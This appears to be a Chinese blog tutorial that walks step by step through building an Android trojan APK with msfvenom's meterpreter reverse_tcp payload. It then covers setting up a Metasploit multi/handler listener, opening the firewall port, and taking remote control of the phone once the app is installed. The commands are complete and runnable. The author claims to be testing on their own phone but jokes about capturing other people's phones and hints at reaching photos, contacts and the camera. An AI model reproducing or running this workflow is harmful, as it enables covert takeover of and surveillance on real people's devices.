Centos Linux下使用Metasploit渗透android
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
这篇文档只适合在Centos Linux已经安装了Metasploit的大伙。没有安装Metasploit的小伙们,可以前往
https://blog.csdn.net/wyvbboy/article/details/51526640
博客去浏览并安装,然后再回来~(如果此博客的安装已经过期了,官方找或者网上找)
看完Metasploit简介后,其下有一个工具msfvenom可以生成木马,打开linux终端,最好登录root,怕出错,然后输入命令
$ msfvenom
Enter下看看都啥?一大堆指令让你烦~
先查看一下所有类型的攻击负荷(看成木马也行),输入命令
$ msfvenom --list payloadsEnter下来,数据很多,我们从里面找Android类型的就行,我是来操控手机的,不会干其它的
复制一下黄色框的字段,tcp格式的,接下来会用到
android/meterpreter/reverse_tcp
知道了“木马”的名称,还得知道终端的ip,输入ifconfig查看内网ip(俺的是本地测试的)
$ ifconfig
ip拿到了,还不赶紧的开始生成木木马-_-,msfvenom兄弟,靠你了,输入
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.129 LPORT=3333 R > first.apk
-p, --payload 使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。
LHOST ip地址
LPORT 自定义端口(注意,那些所谓的防火墙全踏马都要关闭,记得端口要放行且没被占用,不然渗透没软用)
生成的木马最好能放在一个可以访问的文件夹上,我直接first.apk,在终端目前路径上可以看到有文件生成。如果没有,那就是失败了,检查一下你的端口是否占用!生成成功的编译大概会出现Payload size: 10181 bytes字段
木马生成完毕,msfvenom兄弟的工作就基本完工了,接下来就有请msfconsole上场了,没错,就是打开metasploit的控制台,着手配置相关信息,开始渗透了~
直接输入msfconsole
$ msfconsole
长久看多了单调代码的你,下面的图形代码有没有让你灰色的世界多点点色彩~~
谈正事~我们需要配置什么呢?前面生成木马的时候不是设置了ip和端口吗?现在我们也要在控制台上配置ip和端口,做监听来的
要做的流程大概是这些
(在msfconsole模式下)加载exploit模块
msf > use exploit/multi/handler
(exploit模式下)选择之前我们粘贴过一次的攻击载荷:android/meterpreter/reverse_tcp
msf exploit(multi/handler)> set payload android/meterpreter/reverse_tcp
(exploit模式下)查看一下列表有没有多出你设置的载荷
msf exploit(multi/handler)> show options
(exploit模式下)设置黄色框下的LHOST和LPORT,就设置成之前生成木马搞的ip和端口
顺便放行端口,输入命令firewall-cmd --add-port=3333/tcp
firewall-cmd --add-port=3333/tcp # 开放通过tcp访问3333
配置的流程都搞完了,马上就是渗透了。
群灵觉醒,封印解除,出来吧!exploit
输入命令exploit,开始监控,记住不要关掉,就坐等别人的手机安装,然后别人点击的瞬间,俺这里马上获取到别人手机的控制权,到时候,嘿嘿。当然,俺这里是渗透自己的手机(然并软—~)
既然是渗透自己的手机,把生成的木马拿出来下载吧,俺这里是ftp连接linux成功后,找到木马下载安装到自己的手机上(杀毒软件请关掉),我用的是xftp,只要你能把那个木马拿出来下载,管你用什么办法~~
安装好木马后,点击打开的瞬间,没有啥反应。手机上没反应没关系,关键是终端exploit监听有反应,并且开始渗透并成功。
如果终端没有反应,就是防火墙的问题,设置的端口要放行
输个?,查看命令列表
比如查看下手机信息
sysinfo
想打开某个应用,输入app_list查看app列表
然后使用使用app_run命令打开app对应的package名称
手机上的termux就会自己启动
好了,还有关于相册或者通讯录、照相什么的指令就不讲了,你们自己探究探究吧
